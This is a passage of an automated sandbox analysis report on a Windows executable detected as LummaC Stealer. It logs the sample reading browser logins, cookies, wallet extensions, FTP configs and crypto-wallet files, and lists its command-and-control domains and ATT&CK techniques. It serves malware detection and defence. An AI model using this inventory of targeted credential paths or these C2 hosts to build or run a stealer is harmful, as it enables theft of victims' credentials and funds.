              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\AQRFEVRTGLJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\CZQKSDDMWRJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\NWCXBPIUYIJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\BXAJUJAOEOJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\DQOFHVHTMGJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: C:\Users\user\Documents\HMPPSXQPQVJump to behavior
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeDirectory queried: number of queries: 1001
              Source: Yara matchFile source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: NAliwxUTJ4.exe PID: 828, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              Process Injection              		34
              Virtualization/Sandbox Evasion              		2
              OS Credential Dumping              		1
              Query Registry              		Remote Services1
              Archive Collected Data              		11
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory751
              Security Software Discovery              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager34
              Virtualization/Sandbox Evasion              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS2
              Process Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain Credentials223
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              NAliwxUTJ4.exe61%ReversingLabsWin32.Trojan.Symmi
              NAliwxUTJ4.exe100%AviraTR/Crypt.XPACK.Gen
              NAliwxUTJ4.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              discokeyus.lat
              		104.21.21.99
              		truefalse
                		high
                grannyejh.lat
                		unknown
                		unknownfalse
                  		high
                  sweepyribs.lat
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://discokeyus.lat/apifalse
                      		high

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://discokeyus.lat/q_2NAliwxUTJ4.exe, 00000001.00000003.2647853138.0000000000EDA000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2648239743.0000000000EDA000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://duckduckgo.com/chrome_newtabNAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://discokeyus.lat/g$NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E58000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://duckduckgo.com/ac/?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://www.google.com/images/branding/product/ico/googleg_lodp.icoNAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiNAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://crl.rootca1.amazontrust.com/rootca1.crl0NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://discokeyus.lat/apiuNAliwxUTJ4.exe, 00000001.00000003.2647901427.00000000054AF000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2639237104.00000000054AF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://discokeyus.lat/apiakNAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EC9000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://ocsp.rootca1.amazontrust.com0:NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://www.ecosia.org/newtab/NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgNAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brNAliwxUTJ4.exe, 00000001.00000003.2615332629.00000000055C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_NAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://ac.ecosia.org/autocomplete?q=NAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://crl.microNAliwxUTJ4.exe, 00000001.00000003.2648298445.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560626361.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000002.2730882542.0000000000EB1000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2647921088.0000000000E75000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2673811023.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2560747517.0000000000E87000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2669781908.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2687998842.0000000000EB0000.00000004.00000020.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2688450690.0000000000EB1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgNAliwxUTJ4.exe, 00000001.00000003.2616949974.00000000054C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.c.lencr.org/0NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://x1.i.lencr.org/0NAliwxUTJ4.exe, 00000001.00000003.2612223627.00000000054F7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchNAliwxUTJ4.exe, 00000001.00000003.2562303234.00000000054EB000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2561526381.00000000054ED000.00000004.00000800.00020000.00000000.sdmp, NAliwxUTJ4.exe, 00000001.00000003.2562391972.00000000054EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
